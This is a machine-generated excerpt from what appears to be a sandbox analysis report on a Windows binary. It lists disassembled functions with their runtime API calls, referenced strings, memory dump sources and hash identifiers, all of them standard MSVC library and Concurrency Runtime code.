                                          • API ID: _free$Info
                                          • String ID: w#G!
                                          • API String ID: 2509303402-519468572
                                          • Opcode ID: 714dc79c2dd8a1cfcb2f58ff189db313063b39f73a2043177d95eb0797935b6d
                                          • Instruction ID: fb7a5a479a1fc25aebded8279feb28963fc3bd268d7e971b4d2de16dcf326d1a
                                          • Opcode Fuzzy Hash: 714dc79c2dd8a1cfcb2f58ff189db313063b39f73a2043177d95eb0797935b6d
                                          • Instruction Fuzzy Hash: AAB19D719003059FDB21DFA8C881BFEBBF5BF09310F14816AF499A7292DB75A941CB60
                                          APIs
                                          • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00A5E901
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E912
                                          • DName::operator+=.LIBCMT ref: 00A5E920
                                          • UnDecorator::getPtrRefType.LIBCMT ref: 00A5E952
                                          • operator+.LIBVCRUNTIME ref: 00A5E973
                                          • UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00A5E9D0
                                          • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00A5E9D9
                                          • UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 00A5E9F1
                                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00A5EA2D
                                          • operator+.LIBVCRUNTIME ref: 00A5EA4E
                                          • DName::DName.LIBVCRUNTIME ref: 00A5EA60
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5EA8B
                                          • DName::operator+=.LIBCMT ref: 00A5EA99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
                                          • String ID: std::nullptr_t$std::nullptr_t $volatile
                                          • API String ID: 2673590388-294867888
                                          • Opcode ID: fb0b8d3a1b8591447a36190d74e3cdd341aae16ab4a7e726e029acc9b16dfbb4
                                          • Instruction ID: 77fd4611d8b7fcc6d1f7da066fd269064f2610789e2e473a7f1d977b16a42390
                                          • Opcode Fuzzy Hash: fb0b8d3a1b8591447a36190d74e3cdd341aae16ab4a7e726e029acc9b16dfbb4
                                          • Instruction Fuzzy Hash: C951D171900208EFCB28DF69C9458AAFFB5FF05742B14455AFC0696266EB36CB4ECB50
                                          APIs
                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,21472377), ref: 00A3F2F4
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F309
                                          • ResetEvent.KERNEL32(00000000,21472377), ref: 00A3F313
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A3F37D
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F392
                                          • SetEvent.KERNEL32(00000000), ref: 00A3F3A1
                                          • CloseHandle.KERNEL32(00000000,21472377), ref: 00A3F3BB
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,21472377), ref: 00A3F412
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3F427
                                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,21472377), ref: 00A3F439
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Event$CloseHandle$Create$ObjectOpenResetSingleWait
                                          • String ID: w#G!
                                          • API String ID: 3951656645-519468572
                                          • Opcode ID: 997a5b263d4fa3144d674f67e8951c9764b353966ecd5253ffd260b377e8d93b
                                          • Instruction ID: bdb471c8296b7a4e729623926c8ab1121c20aabd5f713e5a52bd08bd82b8c61d
                                          • Opcode Fuzzy Hash: 997a5b263d4fa3144d674f67e8951c9764b353966ecd5253ffd260b377e8d93b
                                          • Instruction Fuzzy Hash: 34617C75D15358AFDF21CBE5C945B9EB7B4AF05714F24422AF828AB281C770AD05CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 561e0a6e6cccad94f580a2573a19e1c3f3f591df82545b0bea86f5859c1181ef
                                          • Instruction ID: 0448eb8a87d40730757b0acc71db7080ec967d5714a37f69b1f4a92c5e8850bf
                                          • Opcode Fuzzy Hash: 561e0a6e6cccad94f580a2573a19e1c3f3f591df82545b0bea86f5859c1181ef
                                          • Instruction Fuzzy Hash: 32C114B2E40205BBDB20DBA8CD42FDE77F8AF59710F14C165FA49FB282D6709A418761
                                          APIs
                                          • SetEvent.KERNEL32(00000000,21472377), ref: 00A3EB69
                                          • SetEvent.KERNEL32(00000000,21472377), ref: 00A3EBC6
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,21472377), ref: 00A3EBDA
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A3EBFF
                                          • CloseHandle.KERNEL32(?), ref: 00A3EC33
                                          • SetEvent.KERNEL32(00000000), ref: 00A3EC70
                                            • Part of subcall function 009B50A0: CreateEventA.KERNEL32(?,?,?,?,21472377,w#G!w#G!,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000), ref: 009B50D4
                                            • Part of subcall function 009B50A0: CloseHandle.KERNEL32(00000000,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 009B50EF
                                          • SetEvent.KERNEL32(00000000,?,21472377), ref: 00A3ECF8
                                          • CloseHandle.KERNEL32(?,21472377), ref: 00A3ED26
                                          • CloseHandle.KERNEL32(?,21472377), ref: 00A3EE03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                          • String ID: w#G!
                                          • API String ID: 573037752-519468572
                                          • Opcode ID: a59120b5490e64e29ed8bdbf2112caa44ef21ff24693959443c28b54acc14b2c
                                          • Instruction ID: afdfb9e8f9ee767adfb7b82b5bbbbbca809aa964afe13104f5ebcf3645389588
                                          • Opcode Fuzzy Hash: a59120b5490e64e29ed8bdbf2112caa44ef21ff24693959443c28b54acc14b2c
                                          • Instruction Fuzzy Hash: F8A1BC75A002099FDF15DF68C98476EBBB4FF44328F244259E809AB291DB35EE46CBD0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00A24DAA
                                          • GetLastError.KERNEL32(0000000A), ref: 00A24DD5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A24E16
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                          • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error $w#G!$w#G!
                                          • API String ID: 651023626-2759988153
                                          • Opcode ID: e508c746072669fb60aacb471d5998c291d0b11db0e43d7c92a09262eb248a3b
                                          • Instruction ID: cdf964c58a5ec20768bba3525ce0cf30ddb5360a6e5e475f81e21c08d6d62142
                                          • Opcode Fuzzy Hash: e508c746072669fb60aacb471d5998c291d0b11db0e43d7c92a09262eb248a3b
                                          • Instruction Fuzzy Hash: 65415F75A04348EBDB10DFE8DD45F9EB7B8FB08700F10466AF906A7281DB78A905CB51
                                          APIs
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00A5A6D1
                                          • ___TypeMatch.LIBVCRUNTIME ref: 00A5A803
                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00A5A8CD
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5A92B
                                          • _UnwindNestedFrames.LIBCMT ref: 00A5A94F
                                          • CallUnexpected.LIBVCRUNTIME ref: 00A5A96A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                          • String ID: csm$csm$csm
                                          • API String ID: 2291861386-393685449
                                          • Opcode ID: 8b60f631ac0d8b6b47c32bc0b9596b8ae98b57c4268130c0e4dd8720fadee165
                                          • Instruction ID: b4f4c0b282cccfe4a6ba471e51069fa9f1ca0fe5d02cfd129646b32a3074c251
                                          • Opcode Fuzzy Hash: 8b60f631ac0d8b6b47c32bc0b9596b8ae98b57c4268130c0e4dd8720fadee165
                                          • Instruction Fuzzy Hash: 92B1CE31E00219EFCF15DFA4D981AAEBBB5FF28312F14425AEC15AB201D331D959CB92
                                          APIs
                                            • Part of subcall function 00A10AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10B9E
                                            • Part of subcall function 00A10AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10C09
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A127C4
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A1282E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_type_info_name$Name___un
                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                          • API String ID: 3683324773-4091968653
                                          • Opcode ID: 035b5193fc7c3aee2eafca7bf3cb88da2776c8f3ee8b69b029b5430136b875c8
                                          • Instruction ID: 64cc554c2503430d121b18021d381acd3cf36e65c4cf92aade8bed6da4000406
                                          • Opcode Fuzzy Hash: 035b5193fc7c3aee2eafca7bf3cb88da2776c8f3ee8b69b029b5430136b875c8
                                          • Instruction Fuzzy Hash: 4D61C470604741AFC711EF74C956B9BBBF5BF81300F004A19F1A55B2A1EBB1D998CB92
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 00A3CF70
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3CFAC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A3CFF4
                                          • __Getcvt.LIBCPMT ref: 00A3D001
                                            • Part of subcall function 009B2A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                            • Part of subcall function 009B2A30: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00A3D044
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3D064
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3D085
                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A3D094
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$std::locale::_$Lockit::_Lockit::~_$Locimp::_Locinfo::_$AddfacGetcvtH_prolog3InitLocimpLocimp_Locinfo_ctorLocinfo_dtorNew_Setgloballocale
                                          • String ID: w#G!
                                          • API String ID: 1428944335-519468572
                                          • Opcode ID: 0887bf020b99f56c95cb26e29ea67da22c236f954526df56272fc87ae4932b45
                                          • Instruction ID: ba1f5a74094a4d1280fd278fbe0bbd0686722c6e6c62af7ac4adbf49a6d1e79c
                                          • Opcode Fuzzy Hash: 0887bf020b99f56c95cb26e29ea67da22c236f954526df56272fc87ae4932b45
                                          • Instruction Fuzzy Hash: EE51FF70C01748DFDB20DFA8D9417AEBBB4FF11304F10426AE815AB292EB74AA45CB91
                                          APIs
                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A4A05B
                                          • SwitchToThread.KERNEL32(?), ref: 00A4A07E
                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A4A09D
                                          • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00A4A0B9
                                          • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00A4A0C4
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4A0EB
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4A0F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                          • String ID: count$ppVirtualProcessorRoots
                                          • API String ID: 3409498682-3650809737
                                          • Opcode ID: e5dd0544b1cde51cb9f6f0fda57dc6851b251005c365a0d030352ccd7034f668
                                          • Instruction ID: a33686195a4a835436f5b58e862ae91395a74270b034e387cb51cbe90e50e55c
                                          • Opcode Fuzzy Hash: e5dd0544b1cde51cb9f6f0fda57dc6851b251005c365a0d030352ccd7034f668
                                          • Instruction Fuzzy Hash: 40217E78A40209AFCF14EFA5D585ABEBBB4BFD9354F4040A9E905AB251CB30AE05CB51
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00A54AB8
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54ACA
                                          • GetCurrentThread.KERNEL32 ref: 00A54AD2
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54ADA
                                          • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00A48A12,00000000,00000000,00000002,?,?,?,?,?,00A4896E,?,?,?), ref: 00A54AF3
                                          • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00A54B14
                                            • Part of subcall function 00A42DA4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 00A42DB0
                                            • Part of subcall function 00A42DA4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A42DBE
                                            • Part of subcall function 00A42DA4: ___crtSetThreadpoolWait.LIBCPMT ref: 00A42DD0
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54B26
                                          • GetLastError.KERNEL32(?,?,?,?,00A4896E,?,?,?,?,00000000,?,00000000), ref: 00A54B51
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A54B67
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54B75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                          • String ID:
                                          • API String ID: 1073306966-0
                                          • Opcode ID: 82fcef33f532bc64b93fac4e82e30130a97d2d2735e6b1eec5e2b177d18f45f2
                                          • Instruction ID: 1d039b6e8a0f0b92da8c810b3031da7e9348fe886d950ef838477031a8f126b2
                                          • Opcode Fuzzy Hash: 82fcef33f532bc64b93fac4e82e30130a97d2d2735e6b1eec5e2b177d18f45f2
                                          • Instruction Fuzzy Hash: F9110236A44300ABDF10ABB49D4AF9A7BB8BF59305F040076FE45DA162EA70C9088771
                                          APIs
                                          • _free.LIBCMT ref: 00A7429A
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A742A6
                                          • _free.LIBCMT ref: 00A742B1
                                          • _free.LIBCMT ref: 00A742BC
                                          • _free.LIBCMT ref: 00A742C7
                                          • _free.LIBCMT ref: 00A742D2
                                          • _free.LIBCMT ref: 00A742DD
                                          • _free.LIBCMT ref: 00A742E8
                                          • _free.LIBCMT ref: 00A742F3
                                          • _free.LIBCMT ref: 00A74301
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: f7801ce608abba74542970841872fbf783f960c392e8ec804bb14be55bbae25b
                                          • Instruction ID: 773eb51a76abdea8016d751b45bece02f5b5608bdc6b4da74158f130aaa31b0a
                                          • Opcode Fuzzy Hash: f7801ce608abba74542970841872fbf783f960c392e8ec804bb14be55bbae25b
                                          • Instruction Fuzzy Hash: A2116276510108AFDF21EF94CE52CD93BB5EF49790F51C1A6BA488B222EB31DB509B81
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3A898
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                          • API String ID: 1383202999-2891247106
                                          • Opcode ID: 8dad2f52efd603d93cd52e0caa5f2804f4c8d942a4c4d84d01fbc6fe4a77387d
                                          • Instruction ID: 372579263995b6eb0d3c09a45305ff71798392442df8a37a53ffc9c98f12650c
                                          • Opcode Fuzzy Hash: 8dad2f52efd603d93cd52e0caa5f2804f4c8d942a4c4d84d01fbc6fe4a77387d
                                          • Instruction Fuzzy Hash: CFA1897190021AAFCF05CF94CD92EFE7BBAEF19314F10441AFA86A6291D631DD50DB62
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3522D
                                            • Part of subcall function 00A2B22F: __EH_prolog3.LIBCMT ref: 00A2B236
                                            • Part of subcall function 00A2B22F: std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 00A2B22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                          • API String ID: 1538362411-2891247106
